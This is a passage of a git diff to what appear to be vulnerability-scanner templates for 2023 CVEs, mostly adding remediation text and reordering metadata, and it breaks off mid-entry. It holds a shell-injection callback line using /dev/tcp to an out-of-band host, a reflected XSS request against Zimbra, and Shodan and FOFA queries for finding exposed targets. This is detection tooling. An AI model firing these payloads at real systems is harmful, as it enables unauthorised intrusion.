@@ info: severity: medium description: | OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php. + remediation: | + Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability. reference: - https://www.ourphp.net/ - https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-30212 cwe-id: CWE-79 epss-score: 0.03155 - cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* epss-percentile: 0.89844 + cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: ourphp product: ourphp tags: cve,cve2023,xss,ourphp diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 5ffb40ab5b..493fc87c27 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/webkul/hotelcommerce - http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html @@ -18,11 +20,11 @@ info: cve-id: CVE-2023-30256 cwe-id: CWE-79 epss-score: 0.01475 - cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:* epss-percentile: 0.85124 + cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: webkul product: qloapps tags: packetstorm,cve,cve2023,xss,webkul-qloapps,unauth diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index dfefa2a28b..c7eb3543bb 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -6,27 +6,27 @@ info: severity: medium description: | Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 6.1.6. reference: - https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f - https://wordpress.org/plugins/advanced-custom-fields/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-30777 - https://patchstack.com/database/vulnerability/advanced-custom-fields-pro/wordpress-advanced-custom-fields-pro-plugin-6-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve - https://patchstack.com/database/vulnerability/advanced-custom-fields/wordpress-advanced-custom-fields-plugin-6-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve - remediation: Fixed in version 6.1.6. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-30777 cwe-id: CWE-79 epss-score: 0.00343 - cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:* epss-percentile: 0.67945 + cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: advancedcustomfields product: advanced_custom_fields + framework: wordpress tags: wpscan,cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss http: diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 2530e3a8cf..8dae9091af 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Repetier Server. reference: - https://cybir.com/2023/cve/poc-repetier-server-140/ - https://www.repetier-server.com/download-repetier-server/ @@ -15,15 +17,15 @@ info: cve-id: CVE-2023-31059 cwe-id: CWE-22 epss-score: 0.00353 - cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* epss-percentile: 0.68399 + cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Repetier-Server" - fofa-query: title="Repetier-Server" + max-request: 1 vendor: repetier-server product: repetier-server + shodan-query: title:"Repetier-Server" + fofa-query: title="Repetier-Server" tags: cve,cve2023,repetier,lfi http: diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 85b7d64ffb..99e24d0a7f 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-31548 - https://nvd.nist.gov/vuln/detail/CVE-2023-31548 @@ -15,11 +17,11 @@ info: cve-id: CVE-2023-31548 cwe-id: CWE-79 epss-score: 0.00078 - cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* epss-percentile: 0.31901 + cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: churchcrm product: churchcrm tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated diff --git a/http/cves/2023/CVE-2023-32117.yaml b/http/cves/2023/CVE-2023-32117.yaml index 201af0e932..e426d8e267 100644 --- a/http/cves/2023/CVE-2023-32117.yaml +++ b/http/cves/2023/CVE-2023-32117.yaml @@ -6,18 +6,18 @@ info: severity: high description: | The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more. + remediation: Fixed in 1.2.0 reference: - https://github.com/RandomRobbieBF/CVE-2023-32117 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/integrate-google-drive/integrate-google-drive-1199-missing-authorization-via-rest-api-endpoints - remediation: Fixed in 1.2.0 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2023-32117 metadata: + verified: true max-request: 1 publicwww-query: "/wp-content/plugins/integrate-google-drive/" - verified: true tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive http: diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 5bc85ca637..8a3b9810df 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -6,27 +6,27 @@ info: severity: high description: | Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js. + remediation: Fixed in version 5.42.1 reference: - https://github.com/advisories/GHSA-wf7x-fh6w-34r6 - https://nvd.nist.gov/vuln/detail/CVE-2023-32235 - https://github.com/TryGhost/Ghost/commit/378dd913aa8d0fd0da29b0ffced8884579598b0f - https://github.com/TryGhost/Ghost/compare/v5.42.0...v5.42.1 - remediation: Fixed in version 5.42.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-32235 cwe-id: CWE-22 epss-score: 0.00998 - cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* epss-percentile: 0.81698 + cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: - max-request: 2 verified: true - shodan-query: http.component:"Ghost" - framework: node.js + max-request: 2 vendor: ghost product: ghost + framework: node.js + shodan-query: http.component:"Ghost" tags: cve,cve2023,lfi,ghostcms http: diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index cf73fcf335..a0d64051fb 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. + remediation: | + Update WordPress Elementor Lite plugin to the latest version (5.7.2) or apply the patch provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-32243 - https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites?_s_id=cve @@ -18,15 +20,15 @@ info: cve-id: CVE-2023-32243 cwe-id: CWE-287 epss-score: 0.02722 - cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* epss-percentile: 0.89171 + cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: - google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite - max-request: 6 verified: true - framework: wordpress + max-request: 6 vendor: wpdeveloper product: essential_addons_for_elementor + framework: wordpress + google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive http: diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index e98d5ac47f..2959d97e70 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -6,25 +6,25 @@ info: severity: high description: | Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. + remediation: | + The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice. reference: - https://github.com/advisories/GHSA-gw42-f939-fhvm - https://nvd.nist.gov/vuln/detail/CVE-2023-32315 - remediation: | - The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-32315 cwe-id: CWE-22 epss-score: 0.96325 - cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* epss-percentile: 0.99343 + cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"openfire" + max-request: 1 vendor: igniterealtime product: "openfire" + shodan-query: title:"openfire" tags: cve,cve2023,auth-bypass,openfire,console,kev http: diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 788ac9f65e..c0b54eaa85 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: An unauthenticated attacker could achieve the code execution through a RemoteControl server. + remediation: | + Apply the latest security patches or updates provided by Ivanti to mitigate this vulnerability. reference: - https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939 - https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US @@ -15,12 +17,12 @@ info: cve-id: CVE-2023-32563 cwe-id: CWE-22 epss-score: 0.24808 - cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* epss-percentile: 0.96032 + cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: avalanche vendor: ivanti + product: avalanche tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive http: diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 1ecbb6f6aa..0eec105508 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter. + remediation: | + Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Old Age Home Management System v1.0. reference: - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 - https://nvd.nist.gov/vuln/detail/CVE-2023-33338 @@ -15,11 +17,11 @@ info: cve-id: CVE-2023-33338 cwe-id: CWE-89 epss-score: 0.00732 - cpe: cpe:2.3:a:old_age_home_management_system_project:old_age_home_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.78382 + cpe: cpe:2.3:a:old_age_home_management_system_project:old_age_home_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: old_age_home_management_system_project product: old_age_home_management_system tags: cve,cve2023,oahms,sqli,auth-bypass diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 72458b41fe..16238a47b5 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id= + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/F14me7wq/bug_report/blob/main/vendors/oretnom23/faculty-evaluation-system/SQLi-1.md - https://nvd.nist.gov/vuln/detail/CVE-2023-33439 @@ -15,11 +17,11 @@ info: cve-id: CVE-2023-33439 cwe-id: CWE-89 epss-score: 0.00389 - cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.69875 + cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: faculty_evaluation_system_project product: faculty_evaluation_system tags: cve,cve2023,sqli,faculty,authenticated diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 26bfa310ef..cad0838805 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user. + remediation: | + Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/172672/Faculty-Evaluation-System-1.0-Shell-Upload.html - https://github.com/F14me7wq/bug_report/blob/main/vendors/oretnom23/faculty-evaluation-system/RCE-1.md @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-33440 cwe-id: CWE-434 epss-score: 0.03396 - cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.90194 + cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: faculty_evaluation_system_project product: faculty_evaluation_system tags: packetstorm,cve,cve2023,faculty,rce,intrusive diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 0dc11c3f41..9eccb01be5 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints. + remediation: | + Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability. reference: - https://wpscan.com/vulnerability/0d07423e-98d2-43a3-824d-562747a3d65a - https://github.com/RandomRobbieBF/learning-management-system @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-3345 cwe-id: CWE-200 epss-score: 0.00599 - cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* epss-percentile: 0.75693 + cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: masteriyo product: masteriyo + framework: wordpress tags: wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan http: diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index 231ec20029..e3c5c2d336 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters. + remediation: | + Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in Jeecg P3 Biz Chat. reference: - https://twitter.com/momika233/status/1670701256535572481 - https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/ @@ -16,15 +18,15 @@ info: cve-id: CVE-2023-33510 cwe-id: CWE-668 epss-score: 0.00347 - cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* epss-percentile: 0.68111 + cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: "true" - shodan-query: http.favicon.hash:1380908726 - framework: wordpress + max-request: 1 vendor: jeecg_p3_biz_chat_project product: jeecg_p3_biz_chat + framework: wordpress + shodan-query: http.favicon.hash:1380908726 tags: cve,cve2023,jeecg,lfi http: diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index d677ce46c4..e5c6254c3a 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists. + remediation: | + Apply the latest security patch or upgrade to a patched version of Dolibarr to mitigate the vulnerability. reference: - https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/ - https://nvd.nist.gov/vuln/detail/CVE-2023-33568 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-33568 cwe-id: CWE-552 epss-score: 0.35763 - cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* epss-percentile: 0.96601 + cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: http.favicon.hash:440258421 + max-request: 1 vendor: dolibarr product: dolibarr_erp\/crm + shodan-query: http.favicon.hash:440258421 tags: cve,cve2023,dolibarr,unauth http: diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index b1065f203b..bc1c14d998 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions + remediation: | + Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability. reference: - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb - https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-34124 cwe-id: CWE-287,CWE-305 epss-score: 0.01154 - cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* epss-percentile: 0.83049 + cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true - shodan-query: http.favicon.hash:-1381126564 + max-request: 4 vendor: sonicwall product: analytics + shodan-query: http.favicon.hash:-1381126564 tags: cve,cve2023,sonicwall,shell,injection,auth-bypass,instrusive variables: callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80" diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index d497b6c3e9..5e72cbdb60 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). Additionally, implement input validation and output encoding to mitigate the risk of XSS attacks. reference: - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/ @@ -13,9 +15,9 @@ info: classification: cve-id: CVE-2023-34192 metadata: - fofa-query: icon_hash="475145467" max-request: 2 shodan-query: http.favicon.hash:475145467 + fofa-query: icon_hash="475145467" tags: cve,cve2023,zimbra,xss,authenticated http: @@ -26,12 +28,12 @@ http: Content-Type: application/x-www-form-urlencoded loginOp=login&username={{username}}&password={{password}}&client=preferred - - | GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 7de45b24d1..1e64f4fdc2 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions. + remediation: | + Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: - https://github.com/horizon3ai/CVE-2023-34362 - https://www.horizon3.ai/moveit-transfer-cve-2023-34362-deep-dive-and-indicators-of-compromise/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-34362 cwe-id: CWE-89 epss-score: 0.93679 - cpe: cpe:2.3:a:progress:moveit_cloud:*:*:*:*:*:*:*:* epss-percentile: 0.9877 + cpe: cpe:2.3:a:progress:moveit_cloud:*:*:*:*:*:*:*:* metadata: - max-request: 7 - shodan-query: http.favicon.hash:989289239 verified: true + max-request: 7 vendor: progress product: moveit_cloud + shodan-query: http.favicon.hash:989289239 tags: cve,cve2023,moveit,rce,sqli,intrusive,kev variables: sessioncookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 07c5cbe0b1..a9a15f76ed 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5 - https://nvd.nist.gov/vuln/detail/CVE-2023-34537 @@ -15,11 +17,11 @@ info: cve-id: CVE-2023-34537 cwe-id: CWE-79 epss-score: 0.0007 - cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* epss-percentile: 0.28777 + cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: digitaldruid product: hoteldruid tags: cve,cve2023,hoteldrui,xss,authenticated diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index c78a2aa550..f94c51bc81 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response. + remediation: | + Upgrade to a patched version of Gibbon or apply the necessary security patches to mitigate the LFI vulnerability. reference: - https://github.com/maddsec/CVE-2023-34598 - https://twitter.com/shaybt12/status/1673612503547355137?s=20 @@ -16,15 +18,15 @@ info: cve-id: CVE-2023-34598 cwe-id: CWE-22 epss-score: 0.03671 - cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* epss-percentile: 0.9052 + cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.favicon.hash:-165631681 - fofa-query: icon_hash="-165631681" + max-request: 1 vendor: gibbonedu product: "gibbon" + shodan-query: http.favicon.hash:-165631681 + fofa-query: icon_hash="-165631681" tags: cve,cve2023,gibbon,lfi http: diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index 1147f89a77..9d91847c33 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://github.com/maddsec/CVE-2023-34599 - https://vulmon.com/searchpage?q=CVE-2023-34599 @@ -15,13 +17,13 @@ info: cve-id: CVE-2023-34599 cwe-id: CWE-79 epss-score: 0.00107 - cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* epss-percentile: 0.42545 + cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.favicon.hash:-165631681 vendor: gibbonedu product: gibbon + shodan-query: http.favicon.hash:-165631681 tags: cve,cve2023,gibbon,xss,authenticated,intrusive http: diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 112d0a23d6..08f2b0d5c8 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild. + remediation: | + Upgrade to Ultimate Member version 2.6.7 or later. reference: - https://github.com/gbrsh/CVE-2023-3460 - https://nvd.nist.gov/vuln/detail/CVE-2023-3460 @@ -18,16 +20,16 @@ info: cve-id: CVE-2023-3460 cwe-id: CWE-269 epss-score: 0.1492 - cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95093 + cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - google-query: inurl:/wp-content/plugins/ultimate-member - publicwww-query: /wp-content/plugins/ultimate-member + max-request: 4 vendor: ultimatemember product: ultimate_member framework: wordpress + publicwww-query: /wp-content/plugins/ultimate-member + google-query: inurl:/wp-content/plugins/ultimate-member tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 2a0490478e..6ba3496b13 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the 